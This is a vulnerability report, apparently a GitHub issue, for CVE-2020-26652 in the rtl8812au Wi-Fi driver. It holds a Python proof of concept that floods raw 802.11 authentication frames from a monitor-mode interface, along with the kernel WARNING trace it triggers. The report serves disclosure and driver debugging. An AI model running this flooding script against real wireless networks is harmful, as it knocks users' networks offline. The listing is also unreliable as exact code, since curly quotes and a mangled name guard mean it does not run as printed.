

CVE-2020-26652: fuzzing wifi ,network will down, result is net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211] · Issue #730 · aircrack-ng/rtl8812au

An issue was discovered in the function nl80211_send_chandef in rtl8812au v5.6.4.2 that allows attackers to cause a denial of service.


Testing environment:
root@kali:~# uname -r
5.6.0-kali2-amd64

PoC:
```python

#!/usr/bin/env python
#coding=utf-8
import time
import socket

# Fixed addresses and interface used by the PoC. Both MACs are the reporter's
# sample values; the frame built below is sent from STA_MAC to AP_MAC on IFACE.
# NOTE(review): the curly quotes in this listing (here and below) are an artifact
# of the page's rendering, so the text is not the exact script the reporter ran.
AP_MAC = “00:22:66:88:22:00”
STA_MAC = “00:13:ef:f1:04:ef”
ETH_P_ALL = 3  # protocol number passed to the AF_PACKET socket in start_fuzz
IFACE = “wlan0”  # interface the raw socket binds to; the page puts it in monitor mode first

# Convert a colon-separated MAC string into its six raw octets. Each hex pair
# becomes one chr(), and the pieces are joined into a str (not bytes), which is
# the type the frame concatenations below expect. The page does not say which
# Python version the reporter used.
def mac2str(mac):
return "".join(map(lambda x: chr(int(x, 16)), mac.split(“:”)))

# Radiotap header prepended to the 802.11 frame, copied verbatim from the report.
# The first bytes read as version 0, a pad byte, and a little-endian header
# length of 0x0024 = 36, which matches the 36 bytes assembled in this run.
# The present-flags bitmap(s) and the per-field values that follow are not
# decoded here.
RADIO = “\x00”  # radiotap version
RADIO += “\x00”  # pad
RADIO += “\x24\x00”  # header length, little-endian: 36 bytes
RADIO += “\x2f\x40\x00\xa0”  # present-flags words and fields follow; not decoded
RADIO += “\x20\x08\x00\x00”
RADIO += “\x00\x00\x00\x00”
RADIO += “\x27”
RADIO += “\x43”
RADIO += “\x6e\x25”
RADIO += “\xa0\x00”
RADIO += “\x00\x00”
RADIO += “\x10\x02”
RADIO += “\x6c\x09”
RADIO += “\xa0\x00”
RADIO += “\xd0\x00”
RADIO += “\x00”
RADIO += “\x00”
RADIO += “\xd0”
RADIO += “\x00”

# 802.11 authentication frame (open system) appended to the RADIO header. The
# field labels follow the reporter's own comments; the last two 2-byte fields
# were both labelled "Authentication status" in the original, which looks like a
# copied label rather than a description of their contents -- the page does not
# explain what they are for.
AUTH_REQ_OPEN = RADIO + “\xB0” # Type/Subtype: management frame, subtype authentication
AUTH_REQ_OPEN += “\x08” # Flags
AUTH_REQ_OPEN += “\xc3\x50” # Duration ID
AUTH_REQ_OPEN += mac2str(AP_MAC) # Destination address
AUTH_REQ_OPEN += mac2str(STA_MAC) # Source address
AUTH_REQ_OPEN += mac2str(AP_MAC) # BSSID
AUTH_REQ_OPEN += “\x00\x00” # Sequence control
AUTH_REQ_OPEN += “\x00\x00” # Authentication algorithm (open)
AUTH_REQ_OPEN += “\x01\x00” # Authentication sequence number
AUTH_REQ_OPEN += “\x00\x00” # Authentication status
AUTH_REQ_OPEN += “\x1f\xd8” # labelled "Authentication status" in the report; role not explained on the page
AUTH_REQ_OPEN += “\x5a\x07” # labelled "Authentication status" in the report; role not explained on the page
AUTH_REQ_HDR = AUTH_REQ_OPEN[:-6] # frame minus its last 6 bytes (status + the two trailing fields); unused by start_fuzz below

# Open a raw AF_PACKET socket bound to IFACE and transmit AUTH_REQ_OPEN in an
# unbounded loop, printing the frame before every send. Raw AF_PACKET sockets
# require CAP_NET_RAW (the report runs as root), and the page puts the interface
# into monitor mode beforehand. There is no rate limit, delay, or exit condition,
# so the loop runs until the process is killed; on the air this is simply a
# flood of identical authentication frames from STA_MAC toward AP_MAC, which is
# the kind of traffic a WIDS or driver-level frame counter can flag. The trace
# on the page shows the resulting kernel WARNING in cfg80211's
# nl80211_send_chandef, reached from the driver's RTW_CMD_THREAD while it
# handles a join (join_cmd_hdl -> rtw_cfg80211_ch_switch_notify); "network will
# down" is the reporter's description of the effect. The socket is never closed,
# which is moot only because the loop never returns.
def start_fuzz():
s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
s.bind((IFACE, ETH_P_ALL))
while True:
print("send msg:",AUTH_REQ_OPEN)
s.send(AUTH_REQ_OPEN)

# Entry point: runs the transmit loop; it only returns if start_fuzz raises.
def main():
start_fuzz()

# Script guard. `name` and "main" here are the usual __name__ == "__main__"
# check with the double underscores eaten by the page's markdown rendering (the
# same rendering replaced the straight quotes above with curly ones).
if name == "main":
main()
```
Before executing the PoC, put the interface into monitor mode:
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

Result:

[ 952.607304] WARNING: CPU: 0 PID: 1293 at net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211]
[ 952.607304] Modules linked in: nfnetlink_queue(E) nfnetlink_log(E) 88XXau(OE) nfnetlink(E) bluetooth(E) drbg(E) ansi_cprng(E) ecdh_generic(E) ecc(E) cfg80211(E) rfkill(E) vsock_loopback(E) vmw_vsock_virtio_transport_common(E) vmw_vsock_vmci_transport(E) vsock(E) intel_rapl_msr(E) intel_rapl_common(E) intel_rapl_perf(E) vmw_balloon(E) joydev(E) serio_raw(E) pcspkr(E) sg(E) vmw_vmci(E) evdev(E) ac(E) binfmt_misc(E) fuse(E) sunrpc(E) ip_tables(E) x_tables(E) autofs4(E) ext4(E) crc16(E) mbcache(E) jbd2(E) crc32c_generic(E) sd_mod(E) t10_pi(E) crc_t10dif(E) crct10dif_generic(E) crct10dif_pclmul(E) crct10dif_common(E) crc32_pclmul(E) crc32c_intel(E) ghash_clmulni_intel(E) hid_generic(E) usbhid(E) hid(E) sr_mod(E) cdrom(E) ata_generic(E) vmwgfx(E) aesni_intel(E) libaes(E) crypto_simd(E) cryptd(E) glue_helper(E) ttm(E) psmouse(E) drm_kms_helper(E) ata_piix(E) cec(E) uhci_hcd(E) ehci_pci(E) xhci_pci(E) xhci_hcd(E) e1000(E) ehci_hcd(E) usbcore(E) usb_common(E) mptspi(E) mptscsih(E) mptbase(E)
[ 952.607325] scsi_transport_spi(E) drm(E) libata(E) i2c_piix4(E) scsi_mod(E) button(E)
[ 952.607329] CPU: 0 PID: 1293 Comm: RTW_CMD_THREAD Tainted: G OE 5.6.0-kali2-amd64 #1 Debian 5.6.14-1kali1
[ 952.607330] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/29/2019
[ 952.607340] RIP: 0010:nl80211_send_chandef+0x14b/0x160 [cfg80211]
[ 952.607341] Code: 00 00 be a1 00 00 00 48 89 ef 89 44 24 04 e8 7c 8a 07 d6 85 c0 0f 84 7b ff ff ff 41 bc 97 ff ff ff e9 70 ff ff ff 31 c0 eb a7 <0f> 0b 41 bc ea ff ff ff e9 5f ff ff ff e8 c3 c7 cb d5 0f 1f 00 0f
[ 952.607342] RSP: 0018:ffffa687c088fd80 EFLAGS: 00010246
[ 952.607343] RAX: 0000000000000000 RBX: ffffa687c088fe08 RCX: 0000000000000087
[ 952.607343] RDX: 00000000c07597ec RSI: 00000000ffff259c RDI: ffffa687c088fe08
[ 952.607344] RBP: ffff98e22da4dd00 R08: 0000000000000003 R09: 0000000000000004
[ 952.607344] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa687c088fe08
[ 952.607344] R13: 0000000000000000 R14: ffff98e22da4dd00 R15: ffff98e2343a3014
[ 952.607345] FS: 0000000000000000(0000) GS:ffff98e23be00000(0000) knlGS:0000000000000000
[ 952.607346] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 952.607346] CR2: 00007f9224153030 CR3: 000000007a080005 CR4: 00000000002606f0
[ 952.607365] Call Trace:
[ 952.607395] nl80211_ch_switch_notify.constprop.0+0xcd/0x170 [cfg80211]
[ 952.607424] rtw_cfg80211_ch_switch_notify+0x138/0x147 [88XXau]
[ 952.607440] ? rtw_chk_start_clnt_join+0x79/0x79 [88XXau]
[ 952.607454] rtw_chk_start_clnt_join+0x72/0x79 [88XXau]
[ 952.607468] join_cmd_hdl+0x267/0x373 [88XXau]
[ 952.607476] rtw_cmd_thread+0x295/0x3ed [88XXau]
[ 952.607494] kthread+0xf9/0x130
[ 952.607504] ? rtw_stop_cmd_thread+0x39/0x39 [88XXau]
[ 952.607506] ? kthread_park+0x90/0x90
[ 952.607521] ret_from_fork+0x35/0x40
[ 952.607524] ---[ end trace c0d1960d55eb317c ]---
